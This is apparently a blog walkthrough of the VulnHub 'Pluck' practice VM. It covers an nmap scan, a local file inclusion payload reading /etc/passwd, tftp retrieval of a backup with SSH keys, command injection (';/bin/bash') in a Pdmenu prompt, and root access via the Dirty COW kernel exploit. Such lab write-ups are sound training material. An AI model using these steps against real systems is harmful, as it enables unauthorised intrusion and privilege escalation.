Welcome to my another walkthrough. at this time we’ll look another VM, Pluck is a new VM in VulnHub and its very easy to hack. This Is very good for Newbie hackers for practice and explore their Hacking skills.
We know Target IP : 10.0.0.15 (in my case)
Download Link : https://download.vulnhub.com/pluck/pluck.ova.zip
Now lets Start our Walkthrough.
Scan VM using namp
nmap -p- -sV 10.0.0.15
now we know server’s port 80 open. that means server to host any website.
Scan Vulnerability and Exploitin
Explore this website and search vulnerability. When i visited its About and Contact us page i noticed url , its showing me page=about.php parameter with .php file.
I decided to try to exploit LFI( Local File Inclusion ) attack.
payload : /etc/passwd
URL look like : http://10.0.0.15/index.php?page=/etc/passwd
Note : at the end of file its leak Backup script file path and name (Highlighted in image above)
This script contain very usefull information (See Highlighted text in above pic)
now we know the server use tftp protocol for backup their data.
Lets Fireup our Terminal and type.
we know the backup file name backup.tar
tftp> get backup.tar
Goto your local directory and extract backup.tar
In Backup/home directory 3 user present but only paul have keys.
Using paul keys to login SSH (Try each key )
lets try ssh, Fireup ur terminal and type
ssh -i id_key4 firstname.lastname@example.org
Pdmenu appear. Now there i stuck for some mins to figure out what next.
So, i Decided to select Edit file option in Pdmenu
when i click Edit file shows prompt for name.
in prompt i typed ” ; id ” (without quotes) and enter.<–This vulnerability is know as Command Injection
When u press Enter Vim screen up just type ” :q ” (without quotes )
After exit Vim u can see ur next command output which u inject in prompt.
Do Again last to step : Goto Edit file but this time type “; /bin/bash ” in prompt.
if you do all the things correctly. below the output.
We got paul’s Shell.
now the final step s privilege escalation. to get root privilege first check kernel version (there are many way to get root access )
kernel version is : 4.8.0
Dirty cow is the best vulnerability for this version of kernel.
URL link : https://www.exploit-db.com/exploits/40616/
Download this exploit in paul’s home directory using wget command.
mv 40616 dirtycow.c
now compile and run dirtycow.c
gcc dirtycow.c -o dirtycow -pthread
We Got root privilege. woooooooooooooooooh
Thank you. Comment Below for more